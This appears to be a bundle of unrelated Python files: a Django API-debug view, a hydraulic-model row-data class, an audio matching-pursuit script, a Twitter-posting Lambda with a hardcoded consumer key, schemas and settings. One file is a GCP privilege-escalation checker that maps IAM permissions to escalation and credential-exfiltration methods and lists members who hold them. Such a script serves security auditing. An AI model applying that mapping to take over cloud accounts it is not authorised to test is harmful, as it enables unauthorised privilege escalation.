json.dumps(bodyContent,ensure_ascii=False) elif bodyType == "form-data": fileDict = request.FILES keyCountDict = {} for i in range(0,len(bodyContent)): tmpAttr = bodyContent[i] if tmpAttr['type'] == "file": if "realPath" in bodyContent[i]["value"]: continue fileKey = tmpAttr['key'] if fileKey in keyCountDict.keys(): keyCountDict[fileKey] += 1 else: keyCountDict[fileKey] = 0 tmpFileTempObj = fileDict.getlist(fileKey)[keyCountDict[fileKey]] contentRealPath = updateFileSave(request.session.get("loginName"), tmpFileTempObj, keyCountDict[fileKey]) bodyContent[i]['value']['fileType'] = tmpFileTempObj.content_type bodyContent[i]['value']['realPath'] = contentRealPath data["bodyContent"] = json.dumps(bodyContent,ensure_ascii=False) data['actualResult'] = '' data['assertResult'] = '' data['testResult'] = "NOTRUN" data['execStatus'] = 1 data['beforeExecuteTakeTime'] = 0 data['executeTakeTime'] = 0 data['afterExecuteTakeTime'] = 0 data['totalTakeTime'] = 0 data['businessLineId'] = data["businessLineId_id"] data['moduleId'] = data["moduleId_id"] data['httpConfKey'] = data["httpConfKey_id"] langDict = getLangTextDict(request) try: RedisCache().set_data(testDebugId,json.dumps(data),60*60) #初始设置接口debug的时间是1小时 # debugId = HTTP_interfaceDebugService.interfaceDebugAdd(data,request.session.get("loginName")).id except Exception as e: logging.error(traceback.format_exc()) addUserLog(request, "单接口管理->添加接口调试->插入失败,原因\n%s" % ApiReturn(ApiReturn.CODE_INTERFACE_DEBUG_ADD_EXCEPITON,langDict['web']['httpInterfaceDebugAddException'],"%s" % e).toJson(), "FAIL") return HttpResponse(ApiReturn(ApiReturn.CODE_INTERFACE_DEBUG_ADD_EXCEPITON,langDict['web']['httpInterfaceDebugAddException'],"%s" % e).toJson()) addUserLog(request, "单接口管理->添加接口调试->成功" , "PASS") # return HttpResponse(ApiReturn(ApiReturn.CODE_OK,langDict['web']['httpInterfaceDebugAdd'],str(debugId)).toJson()) return HttpResponse(ApiReturn(ApiReturn.CODE_OK,langDict['web']['httpInterfaceDebugAdd'],testDebugId).toJson()) def debugInterface(request): langDict = getLangTextDict(request) testDebugId = request.POST.get("body") #aaabbb tcpStr = '{"do":1,"InterfaceDebugId":"%s"}' % testDebugId retApiResult = send_tcp_request(tcpStr) if retApiResult.code != ApiReturn.CODE_OK: debugMsg = {} debugMsg["execStatus"] = 4 debugMsg["actualResult"] = str(retApiResult.code)+":"+retApiResult.message debugMsg["assertResult"] = str(retApiResult.code)+":"+retApiResult.message debugMsg["modTime"] = datetime.datetime.now() RedisCache().del_data(testDebugId) # HTTP_interfaceDebugService.setDebugFail(request.session.get("loginName"),debugMsg) addUserLog(request, "单接口管理->接口调试->发送TCP请求->失败,原因\n%s" % retApiResult.toJson(), "FAIL") return HttpResponse(retApiResult.toJson()) else: addUserLog(request, "单接口管理->接口调试->发送TCP请求->成功", "PASS") return HttpResponse(ApiReturn(ApiReturn.CODE_OK, langDict['web']['httpInterfaceDebugSuccess']).toJson()) def getDebugResult(request): langDict = getLangTextDict(request) startTime = time.time() testDebugId = request.POST.get("body") while True: if (time.time() - startTime) >= 1: return HttpResponse(ApiReturn(ApiReturn.CODE_DEBUG_TIMEOUT, langDict['web']['httpDebugTimeout']).toJson()) try: debugResult = json.loads(RedisCache().get_data(testDebugId)) except Exception as e: print(traceback.format_exc()) return HttpResponse(ApiReturn(ApiReturn.CODE_ERROR, "调试结果解析异常,请联系管理员").toJson()) if debugResult["execStatus"] == 3 or debugResult["execStatus"] == 4: debugResult["alias"] = TbConfigHttp.objects.get(httpConfKey=debugResult["httpConfKey"]).alias RedisCache().del_data(testDebugId) addUserLog(request, "单接口管理->接口调试->获取结果->成功", "PASS") return render(request,"InterfaceTest/HTTPInterface/SubPages/HTTP_interface_debug_page.html",debugResult) if __name__=="__main__": print(settings.BASE_DIR)""" Summary: Contains the RowDataCollection object. This is an object used to hold all of the data for a specific row of a unit in an ISIS dat file. It acts a collection pattern to make accessing and updating the contents of a row simpler. Author: Created: 01 Apr 2016 Copyright: 2016 TODO: Updates: """ from __future__ import unicode_literals import copy import logging logger = logging.getLogger(__name__) from ship.datastructures.dataobject import * """logging references with a __name__ set to this module.""" class RowDataCollection(object): """Composite/Facade for the ADataRowObject classes. AUnit classes should instantiate this class in order to manage all the ADataRowObject classes used to hold the units row data. There are several convenience methods to retrieve and safely update the contents. Note: There are many references to a 'key' variable in this class to decipher which object in the collection to access/update/etc. This is one of the ROW_DATA_TYPES enum values in the datunits package. See Also: ROW_DATA_TYPE - in :class:'datunits ' module. TODO: Need to find a way to safely add values to the collection while making sure that all the data objects stay in sync (i.e. have the same number of rows), otherwise it will be chaos. At the moment this is tricky because we need to add individual values at the start. Possibly stop client from using any get methods etc unless all the data objects have the same number of rows. For the time being there is a convenience method checkRowsInSync() that can be called to verify that all of the data objects in this collection have the same length. """ def __init__(self, **kwargs): """Create a reference to the collection list.""" self._collection = [] self._min_collection = 0 self._current_collection = 0 self._updateCallback = kwargs.get('update_callback', None) self.has_dummy = False @classmethod def bulkInitCollection(cls, dataobjects, **kwargs): rc = cls(**kwargs) for d in dataobjects: rc._collection.append(d) rc._max = len(rc._collection) return rc @property def row_count(self): return self.numberOfRows() # def initCollection(self, dataobject): def addToCollection(self, dataobject, index=None): """Setup a new data object and add it to the collection. Args: obj_type (str): The type of ADataRowObject to create. This should be a DataTypes enum from the ADataObject module. vars (list): The variables specific to the ADataRowObject that is going to be instantiated. See Also: ADataRowObject (and subclasses), DataTypes - all in ADataObject module. """ if index is None: self._collection.append(dataobject) else: try: self._collection.insert(index, dataobject) except IndexError: raise('Index %s does not exist in collection' % index) self._max = len(self._collection) def indexOfDataObject(self, key): """Get the index of the DataObject with data_type equal to key. """ for i, c in enumerate(self._collection): if c.data_type == key: return i def iterateRows(self, key=None): """Returns a generator for iterating through the rows in the collection. If no key is given it will return a list containing all of the values in the row. Args: key=None(int): ROW_DATA_TYPE to return. If None all values in the row will be returned as a list. Return: list if key == None, a single value otherwise. """ if key is None: for i in range(0, self.row_count): yield [o.getValue(i) for o in self._collection] else: index = self.indexOfDataObject(key) for i in range(0, self.row_count): yield self._collection[index].getValue(i) def rowAsDict(self, index): """Get the data vals in a particular row by index. Args: index(int): the index of the row to return. Return: dict - containing the values for the requested row. """ output = {} for obj in self._collection: output[obj.data_type] = obj.getValue(index) return output def rowAsList(self, index): """Get the data vals in a particular row by index. Args: index(int): the index of the row to return. Return: dict - containing the values for the requested row. """ output = [] for obj in self._collection: output.append(obj.getValue(index)) return output def dataObject(self, name_key): """Return the ADataRowObject instance requested. Args: name_key (str): The key to use to retrieve the object (e.g. 'chainage'). This is usually a class declared constant e.g. RiverUnit.CHAINAGE. Returns: ADataRowObject or False if the key doesn't match any in the collection. Note: Returns a shallow copy of the collection. Any changes to the values will remain within the main list. If you want to be able to change it without affecting the main copy use getDataObjectCopy(). """ for obj in self._collection: if obj.data_type == name_key: return obj else: raise KeyError('name_key %s was not found in collection' % (name_key)) def dataObjectAsList(self, key): """Returns a DataObject as a list. This will return the row_collection DataObject referenced by the key provided (as a ROW_DATA_TYPES) in list form. If you intend to update the values you should use getRowDataObject instead as the data provided will be mutable and therefore reflected in the values held by the row_collection. If you just want a quick way to loop through the values in one of the data objects and only intend to read the data then use this. Args: key(str): the key for the data object requested. It is best to use the class constants (i.e. RiverUnit.CHAINAGE) for this. Returns: List containing the data in the DataObject that the key points to. Returns false if there is no row collection. Raises: KeyError: If key does not exist. """ try: data_col = self.dataObject(key) if data_col == False: raise KeyError('Key %s does not exist in collection' % (key)) vals = [] for i in data_col: vals.append(i) return vals except KeyError: raise def toList(self): """Returns the row data a list. Collects the row data in each of the ADataObjects in this collection into a list. Then adds them to a list based on the order of this collection. I.e. each inner list is the data pertaining to a single ADataObject. Example: [ [0.0, 1.5, 3.0], [32.5, 31.0, 31.5], [0.03, 0.03, 0.03] ] Returns: List - containing lists of the data in the DataObjects in this collection. Raises: KeyError: If key does not exist. """ outlist = [] for c in self._collection: innerlist = [] for i in c: innerlist.append(i) outlist.append(innerlist) return outlist def toDict(self): """Returns the row data object as a dict. Provides a dict where keys are the datunits.ROW_DATA_TYPES and the values are lists of the values for that type in sequence. If you intend to update the values you should use getRowDataObject instead as the data provided will be mutable and therefore reflected in the values held by the collection. If you just want to read the data then use this. Returns: dict - containing lists of values by ROW_DATA_TYPE. """ vals = {} for c in self._collection: inner = [] for i in c: inner.append(i) vals[c.data_type] = inner return vals def dataValue(self, key, index): """Get the value in a DataObject at index. Args: key(int): ROW_DATA_TYPES for the DataObject. index(int): the row to return the value from. Return: The value in the DataObject at given index. Raises: KeyError - if key does not exist in collection. IndexError - if index does not exist in DataObject. """ for c in self._collection: if c.data_type == key: val = c.getValue(index) return val else: raise KeyError('DataObject %s does not exist in collection' % key) def _addValue(self, key, value=None): """Add a new value to the data object in the collection as referenced by the key provided. Note: You almost certainly don't want to be using this. It's used internally to add values to ADataObject's. If you need to add data use the addRow() method. Args: key (int): Name of the data object to add the given value to. value: Optional - The value to add to the collection. If no value is supplied a default will be used. Raises: KeyError: If the name key doesn't exist in the collection. TODO: Check what other errors are thrown by the data object and make sure that they are dealt with/passed on from here. """ # Find the collection by the key and add the value to it. for c in self._collection: if c.data_type == key: c.addValue(value) break else: raise KeyError('Key %s does not exist in collection' % (key)) # Do this after so it's not removed when something goes wrong if self.has_dummy: self.deleteRow(0) self.has_dummy = False def _setValue(self, key, value, index): """Set the value to the data object in the collection. Note: You almost certainly don't want to be using this. It's used internally to set alues to ADataObject's. If you need to add data use the updateRow() method. It will check consitency across the collection. Args: key (int): the type data object to add the given value to. value: The value to add to the collection. index (int): the index to set the value at. Raises: KeyError: If the name key doesn't exist in the collection. ValueError: If the value is not appropriate for the data type """ # Find the collection by the key and add the value to it. for c in self._collection: if c.data_type == key: try: c.setValue(value, index) break except ValueError: raise else: raise KeyError('Key %s does not exist in collection' % (key)) def getPrintableRow(self, index): """ Get the row data in printable form. Retrieves all of the values in this RowDataObjectCollection in the order that it exists in the list. Args: index (int): the row collection index to access. Returns: string formatted for printing to .DAT file. """ out_str = '' for i, obj in enumerate(self._collection): out_str += obj.getPrintableValue(index) return out_str def updateRow(self, row_vals, index, **kwargs): """Add a new row to the units data rows. Creates a new row from the values in the supplied value dict at the location given by the index. If the index is None then the value will be appended to the end of the row rather than inserted. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like loading a new model. Default is False. Note: If there is any problem while updating the values in the row all datarow objects will be returned to the state they were in before the operation. This ensures that they don't get out of sync if an error is found halfway through adding the different values. This is done by creating a deep copy of the object prior to updating. Args: row_vals (dict): Contains the names of the data objects of collection as keys and the new row values as values. index (int): The index at which to insert the row. Raises: KeyError: If any of the keys don't exist. IndexError: If the index doesn't exist. """ no_copy = kwargs.get('no_copy', False) if index > self.row_count: raise IndexError dataobj_keys = self.collectionTypes() vkeys = row_vals.keys() for k in vkeys: if not k in dataobj_keys: raise KeyError('ROW_DATA_TYPE ' + str(k) + 'is not in collection') temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for key, val in row_vals.items(): self._setValue(key, val, index) except (IndexError, ValueError, Exception) as err: self._resetDataObject(temp_list) raise err finally: if temp_list is not None: for o in temp_list: del o del temp_list def addRow(self, row_vals, index=None, **kwargs): """Add a new row to the units data rows. Creates a new row from the values in the supplied value dict at the location given by the index. If the index is None then the value will be appended to the end of the row rather than inserted. Note: If there is any problem while adding the new row all datarow objects will be returned to the state they were in before the operation. This ensures that they don't get out of sync if an error is found halfway through adding the different values. This is done by creating a deep copy of the object prior to updating. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like loading a new model. Default is False. Args: row_vals (dict): Contains the names of the data objects of collection as keys and the new row values as values. index (int): The index at which to insert the row. If None it will be appended to end of the collection. Raises: KeyError: If any of the keys don't exist. IndexError: If the index doesn't exist. """ no_copy = kwargs.get('no_copy', False) if index is not None and index > self.row_count: raise IndexError dataobj_keys = self.collectionTypes() vkeys = row_vals.keys() for k in vkeys: if not k in dataobj_keys: raise KeyError('ROW_DATA_TYPE ' + str(k) + 'is not in collection') temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for obj in self._collection: if not obj.data_type in vkeys: if obj.default is not None: obj.addValue(obj.default, index) else: raise ValueError else: obj.addValue(row_vals[obj.data_type], index) if not self.checkRowsInSync(): raise RuntimeError except (IndexError, ValueError, Exception): self._resetDataObject(temp_list) raise except RuntimeError as err: logger.error('Collection not in sync!') logger.exception(err) self._resetDataObject(temp_list) logger.error('Collection reset to previous state') raise finally: if temp_list is not None: for o in temp_list: del o del temp_list # Do this after so it's not removed if something goes wrong if self.has_dummy: self.deleteRow(0, no_copy=True) self.has_dummy = False def deleteRow(self, index, **kwargs): """Delete a row from the collection. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like deleting the dummy row. Default is False. Args: index(int): the index to delete the values for. Raise: IndexError: if index is out of the bounds of the collection. """ no_copy = kwargs.get('no_copy', False) if index < 0 or index > self.row_count: raise IndexError temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for obj in self._collection: obj.deleteValue(index) except (IndexError, ValueError, Exception): self._resetDataObject(temp_list) raise finally: if temp_list is not None: for o in temp_list: del o del temp_list def collectionTypes(self): """Get a list of the types (names) of all the objects in the collection. The list returned will contain all of the names used in this row collection. e.g. 'chainage', 'elevation' etc. Returns: keys (list): containing the names of the data objects. """ keys = [] for obj in self._collection: keys.append(obj.data_type) return keys def dataObjectCopy(self, name_key): """Return the ADataRowObject instance requested. Same as the getDataObject() method except it makes a deep copy of the data object before returning it so that any changes will local to the returned copy only and not to the main reference. Args: name_key (str): The key to use to retrieve the object (e.g. 'chainage'). This is usually a class declared constant e.g. RiverUnit.CHAINAGE. Returns: ADataRowObject or False if the key doesn't match any in the collection. """ for obj in self._collection: if obj.data_type == name_key: obj_copy = self._deepCopyDataObjects(obj) return obj_copy else: raise KeyError('name_key %s was not found in collection' % (name_key)) def deleteDataObject(self, name_key): """Delete the ADataRowObject instance requested. Args: name_key (str): The key to use to retrieve the object (i.e. 'chainage') Returns: True if the object was successfully deleted; False if not. """ for obj in self._collection: if obj.data_type == name_key: self._collection.remove(obj) self._max = len(self._collection) return True else: return False def setDummyRow(self, row_vals): """Sets a special 'dummy row' as a placeholder until actual values. Sometimes it can be useful to have placeholder values in a collection. This is particularly true for FMP units that will cause errors in FMP if there is no data in the rows. This method will add the dummy row data and set the self.has_dummy flag to True. When actual row data is added to the collection it will check the flag and delete the row if it's True. """ self.addRow(row_vals, no_copy=True) if self.has_dummy: self.deleteRow(0, no_copy=True) self.has_dummy = True def numberOfRows(self): """Return the number of rows held in the collection Returns: int - number of rows in this collection. """ if not self.checkRowsInSync(): raise RuntimeError('RowCollection objects are not in sync') if self.has_dummy: return 0 else: return len(self._collection[0]) def checkRowsInSync(self): """Checks that the data objects in the collection are in sync. All the rows should be the same length. If they aren't then there's a problem and it will corrupt any output .dat file. Warning: It isn't actually that hard to corrupt the collection at the moment. It's ok if the DataObject classes are only accessed through here. If they are accessed independently of this class and not carefully checked they could fall out of sync. Returns: True if all data collections have the same length, otherwise False. """ lengths = [] for obj in self._collection: lengths.append(obj.record_length) return lengths[1:] == lengths[:-1] def _resetDataObject(self, temp_list): """Reset the data_objects list to its previous state. This method is called when there is a problem with updating the data_objects list. It returns the self owned versions to their original state. Args: temp_list: The versions to return the objects to. """ if temp_list is not None: self._collection = temp_list for o in temp_list: del o del temp_list def _deepCopyDataObjects(self, obj): """Create a deep copy of the data_objects """ object_copy = copy.deepcopy(obj) return object_copy #!/usr/bin/env python3 import sys import json # You can correlate these to the described methods here: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ and here: https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ methods_and_permissions = { 'UpdateIAMRole': { 'Permissions': [ 'iam.roles.update' ], 'Scope': [ 'Organization', 'Project' ] }, 'CreateServiceAccountKey': { 'Permissions': [ 'iam.serviceAccountKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'GetServiceAccountAccessToken': { 'Permissions': [ 'iam.serviceAccounts.getAccessToken' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountImplicitDelegation': { 'Permissions': [ 'iam.serviceAccounts.implicitDelegation' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountSignBlob': { 'Permissions': [ 'iam.serviceAccounts.signBlob' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountSignJwt': { 'Permissions': [ 'iam.serviceAccounts.signJwt' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'SetOrgPolicyConstraints': { 'Permissions': [ 'orgpolicy.policy.set' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateServiceAccountHMACKey': { 'Permissions': [ 'storage.hmacKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'CreateDeploymentManagerDeployment': { 'Permissions': [ 'deploymentmanager.deployments.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'RCECloudBuildBuildServer': { 'Permissions': [ 'cloudbuild.builds.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudFunctionCredsAuthCall': { 'Permissions': [ 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs', 'cloudfunctions.functions.call' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudFunctionCredsUnauthCall': { 'Permissions': [ 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs', 'cloudfunctions.functions.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'UpdateCloudFunction': { 'Permissions': [ 'cloudfunctions.functions.sourceCodeSet', 'cloudfunctions.functions.update', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateGCEInstanceWithSA': { 'Permissions': [ 'compute.disks.create', 'compute.instances.create', 'compute.instances.setMetadata', 'compute.instances.setServiceAccount', 'compute.subnetworks.use', 'compute.subnetworks.useExternalIp', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudRunServiceUnauthCall': { 'Permissions': [ 'run.services.create', 'iam.serviceaccounts.actAs', 'run.services.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudRunServiceAuthCall': { 'Permissions': [ 'run.services.create', 'iam.serviceaccounts.actAs', 'run.routes.invoke' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateAPIKey': { 'Permissions': [ 'serviceusage.apiKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ViewExistingAPIKeys': { 'Permissions': [ 'serviceusage.apiKeys.list' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'SetOrgIAMPolicy': { 'Permissions': [ 'resourcemanager.organizations.setIamPolicy' ], 'Scope': [ 'Organization' ] }, 'SetFolderIAMPolicy': { 'Permissions': [ 'resourcemanager.folders.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder' ] }, 'SetProjectIAMPolicy': { 'Permissions': [ 'resourcemanager.projects.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'SetServiceAccountIAMPolicy': { 'Permissions': [ 'iam.serviceAccounts.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'CreateCloudSchedulerHTTPRequest': { 'Permissions': [ 'cloudscheduler.jobs.create', 'cloudscheduler.locations.list', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] } } def check_privesc(permissions, resource_type, resource_id, member, f): first_method = True for privesc_method in methods_and_permissions: if set(methods_and_permissions[privesc_method]['Permissions']).issubset(set(permissions)) and resource_type[:-1] in methods_and_permissions[privesc_method]['Scope']: if first_method: # Only print out a user if there is a method associated with it print(f'{member} on {resource_type[:-1]} {resource_id}:') f.write(f'{member} on {resource_type[:-1]} {resource_id}:\n') first_method = False print(f' {privesc_method}') f.write(f' {privesc_method}\n') if first_method is False: f.write('\n') try: # Output from enumerate_member_permissions.py with open('all_org_folder_proj_sa_permissions.json', 'r') as f: permissions = json.load(f) except FileNotFoundError: print('Could not find all_org_folder_proj_sa_permissions.json. Run "enumerate_member_permissions.py" first!') sys.exit(1) print('All Privilege Escalation Methods\n') with open('privesc_methods.txt', 'w+') as f: for resource_type in permissions: # Org, Folder, Proj, SA for resource in permissions[resource_type]: # IDs of Orgs, Folders, Projs, SAs for member in permissions[resource_type][resource]: # Members with permissions on the current resource check_privesc(permissions[resource_type][resource][member], resource_type, resource, member, f) print('Misc. setIamPolicy Permissions\n') with open('setIamPolicy_methods.txt', 'w+') as f: first_method = True for resource_type in permissions: # Org, Folder, Proj, SA for resource in permissions[resource_type]: # IDs of Orgs, Folders, Projs, SAs for member in permissions[resource_type][resource]: # Members with permissions on the current resource for permission in permissions[resource_type][resource][member]: if 'setIamPolicy' in permission: if first_method: # Only print out a user if there is a method associated with it print(f'{member} on {resource_type[:-1]} {resource}:') f.write(f'{member} on {resource_type[:-1]} {resource}:\n') first_method = False print(f' {permission}') f.write(f' {permission}\n') if first_method is False: f.write('\n') print('\nDone!') print('Results output to ./privesc_methods.txt and ./setIamPolicy_methods.txt...') from rest_framework import serializers from .pid import ActionPID class ActionPidSerializer(serializers.Serializer): pid = serializers.CharField(max_length=26) info = serializers.SerializerMethodField() def get_info(self, obj): pid = ActionPID(self.validated_data['pid']) info = pid.info() if info: return { 'type': info['type'], 'created_on': info['dt'] } else: return { 'error': 'Not found' } 1-10 #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ @author: Kimia """ from gammatone_utils import * from scikits.talkbox import segment_axis from scikits.audiolab import Sndfile, play import matplotlib.pyplot as plt plt.style.use('ggplot') def matching_pursuit(signal, dict_kernels, threshold=0.1, max_iter=2000): """ Matching pursuit algorithm for encoding :param signal: input signal :param dict_kernels: dictionary of kernels, each column is a kernel :param threshold: stop condition :param max_iter: maximum number of iterations :return: array of scalar weighting factor (one per kernel) """ # Initialization res = signal coeff = np.zeros(dict_kernels.shape[0]) # Iterative decomposition for i in range(max_iter): inner_prod = res.dot(dict_kernels.T) max_kernel = np.argmax(inner_prod) coeff[max_kernel] = inner_prod[max_kernel] / np.linalg.norm(dict_kernels[max_kernel,: ])**2 res = res - coeff[max_kernel] * dict_kernels[max_kernel,: ] if np.linalg.norm(res) < threshold: return coeff return coeff # Parametrization b = 1.019 resolution = 160 step = 8 n_channels = 128 overlap = 50 # Compute gammatone-based dictionary D_multi = np.r_[tuple(gammatone_matrix(b, fc, resolution, step)[0] for fc in erb_space(150, 8000, n_channels))] freq_c = np.array([gammatone_matrix(b, fc, resolution, step)[1] for fc in erb_space(150, 8000, n_channels)]).flatten() centers = np.array([gammatone_matrix(b, fc, resolution, step)[2] + i*resolution for i, fc in enumerate(erb_space(150, 8000, n_channels))]).flatten() # Load test signal filename = 'data/fsew/fsew0_001.wav' f = Sndfile(filename, 'r') nf = f.nframes fs = f.samplerate length_sound = 20000 y = f.read_frames(5000) y = f.read_frames(length_sound) Y = segment_axis(y, resolution, overlap=overlap, end='pad') Y = np.hanning(resolution) * Y # Encoding with matching pursuit X = np.zeros((Y.shape[0],D_multi.shape[0])) for idx in range(Y.shape[0]): X[idx, :] = matching_pursuit(Y[idx, :], D_multi) # Reconstruction of the signal out = np.zeros(int((np.ceil(len(y)/resolution)+1)*resolution)) for k in range(0, len(X)): idx = range(k*(resolution-overlap), k*(resolution-overlap) + resolution) out[idx] += np.dot(X[k], D_multi) squared_error = np.sum((y - out[0:len(y)]) ** 2) # Play the original signal and the reconstructed for comparison play(y, fs=16000) play(out, fs=16000) # Plotting results # 1st plot: original signal/reconstructed signal/residuals arr = np.array(range(length_sound))/float(fs) plt.figure(1) plt.subplot(311) plt.plot(arr, y, 'b', label="Input Signal") plt.legend() plt.subplot(312) plt.plot(arr, out[0:len(y)], 'r', label="Recontruction") plt.legend() plt.subplot(313) plt.plot(arr, (y - out[0:len(y)])**2, 'g', label="Residual") plt.legend() plt.xlabel("Time in s") plt.show() # 2nd plot: spike train plt.figure(2) spikes_pos = np.array(np.nonzero(X)) temporal_position = centers[spikes_pos[0][:]] centre_freq = freq_c[spikes_pos[1][:]] plt.scatter(temporal_position, centre_freq, marker='+', s=1) plt.show() # 3rd plot: example of gammatone-based dictionary fig = plt.figure(3) fig.suptitle("Gammatone filters", fontsize="x-large") freqs = [1000, 300, 40] resolution = 5000 for center in [100, 1500, 3000]: plt.subplot(311) plt.plot(gammatone_function(resolution, freqs[0], center), linewidth=1.5) plt.subplot(312) plt.plot(gammatone_function(resolution, freqs[1], center+300), linewidth=1.5) plt.ylabel("Kernel values") plt.subplot(313) plt.plot(gammatone_function(resolution, freqs[2], center+1000), linewidth=1.5) plt.xlabel("Time (s)") plt.show() from __future__ import print_function import requests from bs4 import BeautifulSoup import tweepy import datetime # this is the URL we will visit to pull the image URL = 'http://www.newseum.org/todaysfrontpages/?tfp_show=all&tfp_id=NY_NYT' # a css selector that matches the images SELECTOR = '.tfp-thumbnail img' # twitter API keys CONSUMER_KEY = '6U0m0uYAAVRWud3fQ6luuaCmj' CONSUMER_SECRET = '**SECRET**' TOKEN = '' TOKEN_SECRET = '**SECRET**' # location to store file before tweeting (must be in /tmp) FILENAME = '/tmp/temp.jpg' def lambda_handler(event, context): # load the page html and parse it with beutifulsoup page = requests.get(URL) soup = BeautifulSoup(page.text) # select the image tag from the html image_el= soup.select(SELECTOR)[0] # create a twitter api object with our keys auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(TOKEN, TOKEN_SECRET) api = tweepy.API(auth) # fetch the raw image using the src attribute on the image tag img = requests.get(image_el['src'], stream=True) # load the image file and save it to FILENAME with open(FILENAME, "wb") as i: i.write(img.raw.read()) # tweet the image with todays date as text api.update_with_media(FILENAME, status=datetime.date.today().strftime('%A %B %e, %Y')) return True __version__ = "0.0.1" from ._reader import get_reader from ._widget import smooth_image, measure_features, view_features from ._writer import write_zarr # -*- coding: utf-8 -*- from sqlalchemy import Column, Float, String from sqlalchemy.orm import declarative_base from zvt.contract import Mixin from zvt.contract.register import register_schema Stock1dMaFactorBase = declarative_base() class Stock1dMaFactor(Stock1dMaFactorBase, Mixin): __tablename__ = "Stock1dMaFactor" level = Column(String(length=32)) code = Column(String(length=32)) name = Column(String(length=32)) open = Column(Float) close = Column(Float) high = Column(Float) low = Column(Float) ma5 = Column(Float) ma10 = Column(Float) ma34 = Column(Float) ma55 = Column(Float) ma89 = Column(Float) ma144 = Column(Float) ma120 = Column(Float) ma250 = Column(Float) register_schema(providers=["zvt"], db_name="stock_1d_ma_factor", schema_base=Stock1dMaFactorBase) # the __all__ is generated __all__ = ["Stock1dMaFactor"] smap_project/settings.py """ Django settings for docker_django project. Generated by 'django-admin startproject' using Django 1.8.1. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SITE_ROOT = os.path.dirname(os.path.realpath(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ['SECRET_KEY'] # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.getenv('DEBUG', 'NO').lower() in ('on', 'true', 'y', 'yes') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'smap' ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', ) ROOT_URLCONF = 'smap_project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'smap_project.wsgi.application' # Database # https://docs.djangoproject.com/en/1.8/ref/settings/#databases # DATABASES = { # 'default': { # 'ENGINE': 'django.db.backends.sqlite3', # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), # } # } if DEBUG: DATABASES = { 